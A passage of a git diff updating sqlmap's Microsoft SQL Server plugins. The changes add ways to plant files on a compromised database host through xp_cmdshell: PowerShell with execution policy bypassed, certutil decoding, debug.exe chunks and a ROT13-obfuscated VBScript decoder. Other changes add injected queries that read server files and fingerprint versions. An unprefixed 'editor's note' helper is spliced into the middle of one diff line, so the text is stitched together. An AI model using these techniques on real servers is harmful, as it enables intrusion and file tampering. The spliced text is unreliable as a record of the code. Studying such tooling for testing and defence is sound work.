isinstance(values, basestring): + if isinstance(values, six.string_types): values = [values] for foundTbl in values: - foundTbl = safeSQLIdentificatorNaming(foundTbl, True) + foundTbl = safeSQLIdentificatorNaming(unArrayizeValue(foundTbl), True) if foundTbl is None: continue @@ -336,16 +368,16 @@ def searchColumn(self): if foundTbl not in dbs[db]: dbs[db][foundTbl] = {} - if colConsider == "1": + if colConsider == '1': conf.db = db conf.tbl = foundTbl conf.col = column - self.getColumns(onlyColNames=True, bruteForce=False) + self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False) - if db in kb.data.cachedColumns and foundTbl in kb.data.cachedColumns[db]\ - and not isNoneValue(kb.data.cachedColumns[db][foundTbl]): + if db in kb.data.cachedColumns and foundTbl in kb.data.cachedColumns[db] and not isNoneValue(kb.data.cachedColumns[db][foundTbl]): dbs[db][foundTbl].update(kb.data.cachedColumns[db][foundTbl]) + kb.data.cachedColumns = {} else: dbs[db][foundTbl][column] = None @@ -359,7 +391,7 @@ def searchColumn(self): infoMsg = "fetching number of tables containing column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s' in database '%s'" % (column, db) logger.info("%s%s" % (infoMsg, infoMsgTbl)) @@ -372,10 +404,10 @@ def searchColumn(self): if not isNumPosStrValue(count): warnMsg = "no tables contain column" if colConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' " % column warnMsg += "in database '%s'" % db - logger.warn(warnMsg) + logger.warning(warnMsg) continue @@ -400,7 +432,7 @@ def searchColumn(self): conf.tbl = tbl conf.col = column - self.getColumns(onlyColNames=True, bruteForce=False) + self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False) if db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[db]: dbs[db][tbl].update(kb.data.cachedColumns[db][tbl]) diff --git a/plugins/dbms/mssqlserver/filesystem.py b/plugins/dbms/mssqlserver/filesystem.py index 076874ac7a1..416cf2d28f5 100644 --- a/plugins/dbms/mssqlserver/filesystem.py +++ b/plugins/dbms/mssqlserver/filesystem.py @@ -1,21 +1,26 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import codecs import ntpath import os +from lib.core.common import checkFile from lib.core.common import getLimitRange from lib.core.common import isNumPosStrValue from lib.core.common import isTechniqueAvailable from lib.core.common import posixToNtSlashes from lib.core.common import randomStr from lib.core.common import readInput -from lib.core.convert import hexencode +from lib.core.compat import xrange +from lib.core.convert import encodeBase64 +from lib.core.convert import encodeHex from lib.core.data import conf +from lib.core.data import kb from lib.core.data import logger from lib.core.enums import CHARSET_TYPE from lib.core.enums import EXPECTED @@ -27,9 +32,6 @@ from plugins.generic.filesystem import Filesystem as GenericFilesystem class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - def _dataToScr(self, fileContent, chunkName): fileLines = [] fileSize = len(fileContent) @@ -45,14 +47,14 @@ def _dataToScr(self, fileContent, chunkName): scrString = "" for lineChar in fileContent[fileLine:fileLine + lineLen]: - strLineChar = hexencode(lineChar) + strLineChar 
= encodeHex(lineChar, binary=False) if not scrString: scrString = "e %x %s" % (lineAddr, strLineChar) else: scrString += " %s" % strLineChar - lineAddr += len(lineChar) + lineAddr += len(strLineChar) // 2 fileLines.append(scrString) @@ -66,35 +68,39 @@ def _updateDestChunk(self, fileContent, tmpPath): chunkName = randomStr(lowercase=True) fileScrLines = self._dataToScr(fileContent, chunkName) - logger.debug("uploading debug script to %s\%s, please wait.." % (tmpPath, randScr)) + logger.debug("uploading debug script to %s\\%s, please wait.." % (tmpPath, randScr)) self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr) - logger.debug("generating chunk file %s\%s from debug script %s" % (tmpPath, chunkName, randScr)) + logger.debug("generating chunk file %s\\%s from debug script %s" % (tmpPath, chunkName, randScr)) - commands = ("cd %s" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr) - complComm = " & ".join(command for command in commands) + commands = ( + "cd \"%s\"" % tmpPath, + "debug < %s" % randScr, + "del /F /Q %s" % randScr + ) - self.execCmd(complComm) + self.execCmd(" & ".join(command for command in commands)) return chunkName - def stackedReadFile(self, rFile): - infoMsg = "fetching file: '%s'" % rFile - logger.info(infoMsg) + def stackedReadFile(self, remoteFile): + if not kb.bruteMode: + infoMsg = "fetching file: '%s'" % remoteFile + logger.info(infoMsg) result = [] txtTbl = self.fileTblName - hexTbl = "%shex" % self.fileTblName + hexTbl = "%s%shex" % (self.fileTblName, randomStr()) self.createSupportTbl(txtTbl, self.tblField, "text") inject.goStacked("DROP TABLE %s" % hexTbl) inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)")) - logger.debug("loading the content of file '%s' into support table" % rFile) - inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, rFile, randomStr(10), randomStr(10)), silent=True) + logger.debug("loading the content of file '%s' into support table" % remoteFile) + inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, remoteFile, randomStr(10), randomStr(10)), silent=True) - # Reference: http://support.microsoft.com/kb/104829 + # Reference: https://web.archive.org/web/20120211184457/http://support.microsoft.com/kb/104829 binToHexQuery = """DECLARE @charset VARCHAR(16) DECLARE @counter INT DECLARE @hexstr VARCHAR(4096) @@ -145,7 +151,7 @@ def stackedReadFile(self, rFile): if not isNumPosStrValue(count): errMsg = "unable to retrieve the content of the " - errMsg += "file '%s'" % rFile + errMsg += "file '%s'" % remoteFile raise SqlmapNoneDataException(errMsg) indexRange = getLimitRange(count) @@ -158,60 +164,74 @@ def stackedReadFile(self, rFile): return result - def unionWriteFile(self, wFile, dFile, fileType): + def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): errMsg = "Microsoft SQL Server does not support file upload with " errMsg += "UNION query SQL injection technique" raise SqlmapUnsupportedFeatureException(errMsg) - def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType): + def _stackedWriteFilePS(self, tmpPath, localFileContent, remoteFile, fileType): infoMsg = "using PowerShell to write the %s file content " % fileType - infoMsg += "to file '%s', please wait.." 
% dFile + infoMsg += "to file '%s'" % remoteFile logger.info(infoMsg) - randFile = "tmpf%s.txt" % randomStr(lowercase=True) - randFilePath = "%s\%s" % (tmpPath, randFile) - encodedFileContent = hexencode(wFileContent) + encodedFileContent = encodeBase64(localFileContent, binary=False) + encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True) + encodedBase64FilePath = "%s\\%s" % (tmpPath, encodedBase64File) - # TODO: need to be fixed - psString = "$s = gc '%s';$s = [string]::Join('', $s);$s = $s.Replace('`r',''); $s = $s.Replace('`n','');$b = new-object byte[] $($s.Length/2);0..$($b.Length-1) | %%{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes('%s',$b)" % (randFilePath, dFile) - psString = psString.encode('utf-16le') - psString = psString.encode("base64")[:-1].replace("\n", "") + randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True) + randPSScriptPath = "%s\\%s" % (tmpPath, randPSScript) - logger.debug("uploading the file hex-encoded content to %s, please wait.." % randFilePath) + localFileSize = len(encodedFileContent) + chunkMaxSize = 1024 - self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile) + logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath) - logger.debug("converting the file utilizing PowerShell EncodedCommand") + for i in xrange(0, localFileSize, chunkMaxSize): + wEncodedChunk = encodedFileContent[i:i + chunkMaxSize] + self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File) - commands = ("cd %s" % tmpPath, - "powershell -EncodedCommand %s" % psString, - "del /F /Q %s" % randFilePath) - complComm = " & ".join(command for command in commands) + psString = "$Base64 = Get-Content -Path \"%s\"; " % encodedBase64FilePath + psString += "$Base64 = $Base64 -replace \"`t|`n|`r\",\"\"; $Content = " + psString += "[System.Convert]::FromBase64String($Base64); Set-Content " + psString += "-Path \"%s\" -Value $Content -Encoding Byte" % remoteFile - self.execCmd(complComm) + logger.debug("uploading the PowerShell base64-decoding script to %s" % randPSScriptPath) + self.xpCmdshellWriteFile(psString, tmpPath, randPSScript) - def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType): + logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % remoteFile) + + commands = ( + "powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath, + "del /F /Q \"%s\"" % encodedBase64FilePath, + "del /F /Q \"%s\"" % randPSScriptPath + ) + + self.execCmd(" & ".join(command for command in commands)) + + def _stackedWriteFileDebugExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType): infoMsg = "using debug.exe to write the %s " % fileType - infoMsg += "file content to file '%s', please wait.." % dFile + infoMsg += "file content to file '%s', please wait.." 
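# Editor's note (sketch): _stackedWriteFilePS above base64-encodes the local file, uploads the
# text in fixed-size chunks through xp_cmdshell, drops a small PowerShell decoder script next
# to it and then runs that script to materialize the binary on the target. The helper below
# only assembles those artifacts locally (chunks, decoder script, command line) so the flow is
# easier to follow; it never touches xp_cmdshell, and every name in it is illustrative.

import base64

def build_ps_write_plan(local_content, remote_file, tmp_path="C:\\Windows\\Temp", chunk_size=1024):
    encoded = base64.b64encode(local_content).decode("ascii")
    chunks = [encoded[i:i + chunk_size] for i in range(0, len(encoded), chunk_size)]

    b64_path = "%s\\tmpf.txt" % tmp_path      # destination of the uploaded base64 text
    ps_path = "%s\\tmpps.ps1" % tmp_path      # destination of the decoder script

    ps_script = (
        '$Base64 = Get-Content -Path "%s"; ' % b64_path +
        '$Base64 = $Base64 -replace "`t|`n|`r",""; ' +
        '$Content = [System.Convert]::FromBase64String($Base64); ' +
        'Set-Content -Path "%s" -Value $Content -Encoding Byte' % remote_file
    )

    commands = (
        'powershell -ExecutionPolicy ByPass -File "%s"' % ps_path,
        'del /F /Q "%s"' % b64_path,
        'del /F /Q "%s"' % ps_path,
    )

    return chunks, ps_script, " & ".join(commands)

# Example:
# chunks, script, cmd = build_ps_write_plan(b"hello", "C:\\temp\\out.bin")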
% remoteFile logger.info(infoMsg) - dFileName = ntpath.basename(dFile) - sFile = "%s\%s" % (tmpPath, dFileName) - wFileSize = os.path.getsize(wFile) + remoteFileName = ntpath.basename(remoteFile) + sFile = "%s\\%s" % (tmpPath, remoteFileName) + localFileSize = os.path.getsize(localFile) debugSize = 0xFF00 - if wFileSize < debugSize: - chunkName = self._updateDestChunk(wFileContent, tmpPath) + if localFileSize < debugSize: + chunkName = self._updateDestChunk(localFileContent, tmpPath) - debugMsg = "renaming chunk file %s\%s to %s " % (tmpPath, chunkName, fileType) - debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile) + debugMsg = "renaming chunk file %s\\%s to %s " % (tmpPath, chunkName, fileType) + debugMsg += "file %s\\%s and moving it to %s" % (tmpPath, remoteFileName, remoteFile) logger.debug(debugMsg) - commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile)) - complComm = " & ".join(command for command in commands) - - self.execCmd(complComm) + commands = ( + "cd \"%s\"" % tmpPath, + "ren %s %s" % (chunkName, remoteFileName), + "move /Y %s %s" % (remoteFileName, remoteFile) + ) + self.execCmd(" & ".join(command for command in commands)) else: debugMsg = "the file is larger than %d bytes. " % debugSize debugMsg += "sqlmap will split it into chunks locally, upload " @@ -219,138 +239,188 @@ def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileTyp debugMsg += "on the server, please wait.." logger.debug(debugMsg) - for i in xrange(0, wFileSize, debugSize): - wFileChunk = wFileContent[i:i + debugSize] - chunkName = self._updateDestChunk(wFileChunk, tmpPath) + for i in xrange(0, localFileSize, debugSize): + localFileChunk = localFileContent[i:i + debugSize] + chunkName = self._updateDestChunk(localFileChunk, tmpPath) if i == 0: debugMsg = "renaming chunk " - copyCmd = "ren %s %s" % (chunkName, dFileName) + copyCmd = "ren %s %s" % (chunkName, remoteFileName) else: debugMsg = "appending chunk " - copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName) + copyCmd = "copy /B /Y %s+%s %s" % (remoteFileName, chunkName, remoteFileName) - debugMsg += "%s\%s to %s file %s\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName) + debugMsg += "%s\\%s to %s file %s\\%s" % (tmpPath, chunkName, fileType, tmpPath, remoteFileName) logger.debug(debugMsg) - commands = ("cd %s" % tmpPath, copyCmd, "del /F %s" % chunkName) - complComm = " & ".join(command for command in commands) + commands = ( + "cd \"%s\"" % tmpPath, + copyCmd, + "del /F /Q %s" % chunkName + ) - self.execCmd(complComm) + self.execCmd(" & ".join(command for command in commands)) - logger.debug("moving %s file %s to %s" % (fileType, sFile, dFile)) + logger.debug("moving %s file %s to %s" % (fileType, sFile, remoteFile)) - commands = ("cd %s" % tmpPath, "move /Y %s %s" % (dFileName, dFile)) - complComm = " & ".join(command for command in commands) + commands = ( + "cd \"%s\"" % tmpPath, + "move /Y %s %s" % (remoteFileName, remoteFile) + ) - self.execCmd(complComm) + self.execCmd(" & ".join(command for command in commands)) - def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType): + def _stackedWriteFileVbs(self, tmpPath, localFileContent, remoteFile, fileType): infoMsg = "using a custom visual basic script to write the " - infoMsg += "%s file content to file '%s', please wait.." % (fileType, dFile) + infoMsg += "%s file content to file '%s', please wait.." 
% (fileType, remoteFile) logger.info(infoMsg) randVbs = "tmps%s.vbs" % randomStr(lowercase=True) randFile = "tmpf%s.txt" % randomStr(lowercase=True) - randFilePath = "%s\%s" % (tmpPath, randFile) - - vbs = """Dim inputFilePath, outputFilePath - inputFilePath = "%s" - outputFilePath = "%s" - Set fs = CreateObject("Scripting.FileSystemObject") - Set file = fs.GetFile(inputFilePath) - If file.Size Then - Wscript.Echo "Loading from: " & inputFilePath - Wscript.Echo - Set fd = fs.OpenTextFile(inputFilePath, 1) - data = fd.ReadAll - fd.Close - data = Replace(data, " ", "") - data = Replace(data, vbCr, "") - data = Replace(data, vbLf, "") - Wscript.Echo "Fixed Input: " - Wscript.Echo data - Wscript.Echo - decodedData = base64_decode(data) - Wscript.Echo "Output: " - Wscript.Echo decodedData - Wscript.Echo - Wscript.Echo "Writing output in: " & outputFilePath - Wscript.Echo - Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile(outputFilePath, 2, True) - ofs.Write decodedData - ofs.close - Else - Wscript.Echo "The file is empty." - End If - Function base64_decode(byVal strIn) - Dim w1, w2, w3, w4, n, strOut - For n = 1 To Len(strIn) Step 4 - w1 = mimedecode(Mid(strIn, n, 1)) - w2 = mimedecode(Mid(strIn, n + 1, 1)) - w3 = mimedecode(Mid(strIn, n + 2, 1)) - w4 = mimedecode(Mid(strIn, n + 3, 1)) - If Not w2 Then _ - strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) - If Not w3 Then _ - strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) - If Not w4 Then _ - strOut = strOut + Chr(((w3 * 64 + w4) And 255)) - Next - base64_decode = strOut - End Function - Function mimedecode(byVal strIn) - Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" - If Len(strIn) = 0 Then - mimedecode = -1 : Exit Function - Else - mimedecode = InStr(Base64Chars, strIn) - 1 - End If - End Function""" % (randFilePath, dFile) - + randFilePath = "%s\\%s" % (tmpPath, randFile) + + vbs = """Qvz vachgSvyrCngu, bhgchgSvyrCngu + vachgSvyrCngu = "%f" + bhgchgSvyrCngu = "%f" + Frg sf = PerngrBowrpg("Fpevcgvat.SvyrFlfgrzBowrpg") + Frg svyr = sf.TrgSvyr(vachgSvyrCngu) + Vs svyr.Fvmr Gura + Jfpevcg.Rpub "Ybnqvat sebz: " & vachgSvyrCngu + Jfpevcg.Rpub + Frg sq = sf.BcraGrkgSvyr(vachgSvyrCngu, 1) + qngn = sq.ErnqNyy + sq.Pybfr + qngn = Ercynpr(qngn, " ", "") + qngn = Ercynpr(qngn, ioPe, "") + qngn = Ercynpr(qngn, ioYs, "") + Jfpevcg.Rpub "Svkrq Vachg: " + Jfpevcg.Rpub qngn + Jfpevcg.Rpub + qrpbqrqQngn = onfr64_qrpbqr(qngn) + Jfpevcg.Rpub "Bhgchg: " + Jfpevcg.Rpub qrpbqrqQngn + Jfpevcg.Rpub + Jfpevcg.Rpub "Jevgvat bhgchg va: " & bhgchgSvyrCngu + Jfpevcg.Rpub + Frg bsf = PerngrBowrpg("Fpevcgvat.SvyrFlfgrzBowrpg").BcraGrkgSvyr(bhgchgSvyrCngu, 2, Gehr) + bsf.Jevgr qrpbqrqQngn + bsf.pybfr + Ryfr + Jfpevcg.Rpub "Gur svyr vf rzcgl." 
+ Raq Vs + Shapgvba onfr64_qrpbqr(olIny fgeVa) + Qvz j1, j2, j3, j4, a, fgeBhg + Sbe a = 1 Gb Yra(fgeVa) Fgrc 4 + j1 = zvzrqrpbqr(Zvq(fgeVa, a, 1)) + j2 = zvzrqrpbqr(Zvq(fgeVa, a + 1, 1)) + j3 = zvzrqrpbqr(Zvq(fgeVa, a + 2, 1)) + j4 = zvzrqrpbqr(Zvq(fgeVa, a + 3, 1)) + Vs Abg j2 Gura _ + fgeBhg = fgeBhg + Pue(((j1 * 4 + Vag(j2 / 16)) Naq 255)) + Vs Abg j3 Gura _ + fgeBhg = fgeBhg + Pue(((j2 * 16 + Vag(j3 / 4)) Naq 255)) + Vs Abg j4 Gura _ + fgeBhg = fgeBhg + Pue(((j3 * 64 + j4) Naq 255)) + Arkg + onfr64_qrpbqr = fgeBhg + Raq Shapgvba + Shapgvba zvzrqrpbqr(olIny fgeVa) + Onfr64Punef = "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm0123456789+/" + Vs Yra(fgeVa) = 0 Gura + zvzrqrpbqr = -1 : Rkvg Shapgvba + Ryfr + zvzrqrpbqr = VaFge(Onfr64Punef, fgeVa) - 1 + Raq Vs + Raq Shapgvba""" + + # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5581 + vbs = codecs.decode(vbs, "rot13") vbs = vbs.replace(" ", "") - encodedFileContent = wFileContent.encode("base64")[:-1] + encodedFileContent = encodeBase64(localFileContent, binary=False) logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath) self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile) - logger.debug("uploading a visual basic decoder stub %s\%s, please wait.." % (tmpPath, randVbs)) + logger.debug("uploading a visual basic decoder stub %s\\%s, please wait.." % (tmpPath, randVbs)) self.xpCmdshellWriteFile(vbs, tmpPath, randVbs) - commands = ("cd %s" % tmpPath, "cscript //nologo %s" % randVbs, - "del /F /Q %s" % randVbs, - "del /F /Q %s" % randFile) - complComm = " & ".join(command for command in commands) + commands = ( + "cd \"%s\"" % tmpPath, + "cscript //nologo %s" % randVbs, + "del /F /Q %s" % randVbs, + "del /F /Q %s" % randFile + ) + + self.execCmd(" & ".join(command for command in commands)) + + def _stackedWriteFileCertutilExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType): + infoMsg = "using certutil.exe to write the %s " % fileType + infoMsg += "file content to file '%s', please wait.." % remoteFile + logger.info(infoMsg) + + chunkMaxSize = 500 + + randFile = "tmpf%s.txt" % randomStr(lowercase=True) + randFilePath = "%s\\%s" % (tmpPath, randFile) + + encodedFileContent = encodeBase64(localFileContent, binary=False) - self.execCmd(complComm) + splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)]) - def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): + logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath) + + self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile) + + logger.debug("decoding the file to %s.." 
% remoteFile) + + commands = ( + "cd \"%s\"" % tmpPath, + "certutil -f -decode %s %s" % (randFile, remoteFile), + "del /F /Q %s" % randFile + ) + + self.execCmd(" & ".join(command for command in commands)) + + def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): # NOTE: this is needed here because we use xp_cmdshell extended # procedure to write a file on the back-end Microsoft SQL Server # file system self.initEnv() - self.getRemoteTempPath() tmpPath = posixToNtSlashes(conf.tmpPath) - dFile = posixToNtSlashes(dFile) - with open(wFile, "rb") as f: - wFileContent = f.read() + remoteFile = posixToNtSlashes(remoteFile) + + checkFile(localFile) + localFileContent = open(localFile, "rb").read() - self._stackedWriteFileVbs(tmpPath, wFileContent, dFile, fileType) + self._stackedWriteFilePS(tmpPath, localFileContent, remoteFile, fileType) + written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) + + if written is False: + message = "do you want to try to upload the file with " + message += "the custom Visual Basic script technique? [Y/n] " + + if readInput(message, default='Y', boolean=True): + self._stackedWriteFileVbs(tmpPath, localFileContent, remoteFile, fileType) + written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) + + if written is False: + message = "do you want to try to upload the file with " + message += "the built-in debug.exe technique? [Y/n] " - written = self.askCheckWrittenFile(wFile, dFile) + if readInput(message, default='Y', boolean=True): + self._stackedWriteFileDebugExe(tmpPath, localFile, localFileContent, remoteFile, fileType) + written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) if written is False: message = "do you want to try to upload the file with " - message += "another technique? [Y/n] " - choice = readInput(message, default="Y") + message += "the built-in certutil.exe technique? 
[Y/n] " - if not choice or choice.lower() == "y": - self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType) - #self._stackedWriteFilePS(tmpPath, wFileContent, dFile, fileType) - written = self.askCheckWrittenFile(wFile, dFile, forceCheck) + if readInput(message, default='Y', boolean=True): + self._stackedWriteFileCertutilExe(tmpPath, localFile, localFileContent, remoteFile, fileType) + written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) return written diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py index 1e3ba250acb..18b4b0beb64 100644 --- a/plugins/dbms/mssqlserver/fingerprint.py +++ b/plugins/dbms/mssqlserver/fingerprint.py @@ -1,14 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.common import Backend from lib.core.common import Format -from lib.core.common import getUnicode -from lib.core.common import randomInt +from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -47,9 +46,9 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - release = kb.bannerFp["dbmsRelease"] if 'dbmsRelease' in kb.bannerFp else None - version = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None - servicepack = kb.bannerFp["dbmsServicePack"] if 'dbmsServicePack' in kb.bannerFp else None + release = kb.bannerFp.get("dbmsRelease") + version = kb.bannerFp.get("dbmsVersion") + servicepack = kb.bannerFp.get("dbmsServicePack") if release and version and servicepack: banVer = "%s %s " % (DBMS.MSSQL, release) @@ -66,9 +65,7 @@ def getFingerprint(self): return value def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(MSSQL_ALIASES) \ - or conf.dbms in MSSQL_ALIASES) and Backend.getVersion() and \ - Backend.getVersion().isdigit(): + if not conf.extensiveFp and Backend.isDbmsWithin(MSSQL_ALIASES): setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion())) self.getBanner() @@ -85,20 +82,30 @@ def checkDbms(self): if conf.direct: result = True else: - randInt = randomInt() - result = inject.checkBooleanExpression("BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" % (randInt, randInt)) + result = inject.checkBooleanExpression("IS_SRVROLEMEMBER(NULL) IS NULL") if result: infoMsg = "confirming %s" % DBMS.MSSQL logger.info(infoMsg) - for version, check in (("2000", "HOST_NAME()=HOST_NAME()"), \ - ("2005", "XACT_STATE()=XACT_STATE()"), \ - ("2008", "SYSDATETIME()=SYSDATETIME()")): + for version, check in ( + ("Azure", "@@VERSION LIKE '%Azure%'"), + ("2025", "CHARINDEX('17.0.',@@VERSION)>0"), + ("2022", "GREATEST(NULL,NULL) IS NULL"), + ("2019", "CHARINDEX('15.0.',@@VERSION)>0"), + ("2017", "TRIM(NULL) IS NULL"), + ("2016", "ISJSON(NULL) IS NULL"), + ("2014", "CHARINDEX('12.0.',@@VERSION)>0"), + ("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)"), + ("2008", "SYSDATETIME()=SYSDATETIME()"), + ("2005", "XACT_STATE()=XACT_STATE()"), + ("2000", "HOST_NAME()=HOST_NAME()"), + ): result = inject.checkBooleanExpression(check) if result: Backend.setVersion(version) + break if Backend.getVersion(): setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion())) @@ -112,7 +119,7 @@ def checkDbms(self): return True else: warnMsg = "the back-end DBMS is not %s" % DBMS.MSSQL - logger.warn(warnMsg) + 
logger.warning(warnMsg) return False @@ -135,19 +142,24 @@ def checkDbmsOs(self, detailed=False): self.createSupportTbl(self.fileTblName, self.tblField, "varchar(1000)") inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "@@VERSION")) - versions = { "2003": ("5.2", (2, 1)), - # TODO: verify this - #"2003": ("6.0", (2, 1)), - "2008": ("7.0", (1,)), - "2000": ("5.0", (4, 3, 2, 1)), - "7": ("6.1", (1, 0)), - "XP": ("5.1", (2, 1)), - "NT": ("4.0", (6, 5, 4, 3, 2, 1)) } + # Reference: https://en.wikipedia.org/wiki/Comparison_of_Microsoft_Windows_versions + # https://en.wikipedia.org/wiki/Windows_NT#Releases + versions = { + "NT": ("4.0", (6, 5, 4, 3, 2, 1)), + "2000": ("5.0", (4, 3, 2, 1)), + "XP": ("5.1", (3, 2, 1)), + "2003": ("5.2", (2, 1)), + "Vista or 2008": ("6.0", (2, 1)), + "7 or 2008 R2": ("6.1", (1, 0)), + "8 or 2012": ("6.2", (0,)), + "8.1 or 2012 R2": ("6.3", (0,)), + "10 or 11 or 2016 or 2019 or 2022": ("10.0", (0,)) + } # Get back-end DBMS underlying operating system version for version, data in versions.items(): - query = "(SELECT LEN(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) - query += "LIKE '%Windows NT " + data[0] + "%')>0" + query = "EXISTS(SELECT %s FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) + query += "LIKE '%Windows NT " + data[0] + "%')" result = inject.checkBooleanExpression(query) if result: @@ -162,7 +174,7 @@ def checkDbmsOs(self, detailed=False): warnMsg = "unable to fingerprint the underlying operating " warnMsg += "system version, assuming it is Windows " warnMsg += "%s Service Pack %d" % (Backend.getOsVersion(), Backend.getOsServicePack()) - logger.warn(warnMsg) + logger.warning(warnMsg) self.cleanup(onlyFileTbl=True) @@ -170,13 +182,12 @@ def checkDbmsOs(self, detailed=False): # Get back-end DBMS underlying operating system service pack sps = versions[Backend.getOsVersion()][1] - for sp in sps: - query = "SELECT LEN(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) - query += "LIKE '%Service Pack " + getUnicode(sp) + "%'" - result = inject.goStacked(query) + query = "EXISTS(SELECT %s FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) + query += "LIKE '%Service Pack " + getUnicode(sp) + "%')" + result = inject.checkBooleanExpression(query) - if result is not None and len(result) > 0 and result[0].isdigit(): + if result: Backend.setOsServicePack(sp) break diff --git a/plugins/dbms/mssqlserver/syntax.py b/plugins/dbms/mssqlserver/syntax.py index 21a0503dcb6..183ce9462c9 100644 --- a/plugins/dbms/mssqlserver/syntax.py +++ b/plugins/dbms/mssqlserver/syntax.py @@ -1,19 +1,24 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.convert import getOrds from plugins.generic.syntax import Syntax as GenericSyntax class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - @staticmethod def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHAR(97)+CHAR(98)+CHAR(99)+CHAR(100)+CHAR(101)+CHAR(102)+CHAR(103)+CHAR(104) FROM foobar" + True + >>> Syntax.escape(u"SELECT 'abcd\xebfgh' FROM foobar") == "SELECT CHAR(97)+CHAR(98)+CHAR(99)+CHAR(100)+NCHAR(235)+CHAR(102)+CHAR(103)+CHAR(104) FROM foobar" + True + """ + def escaper(value): - return 
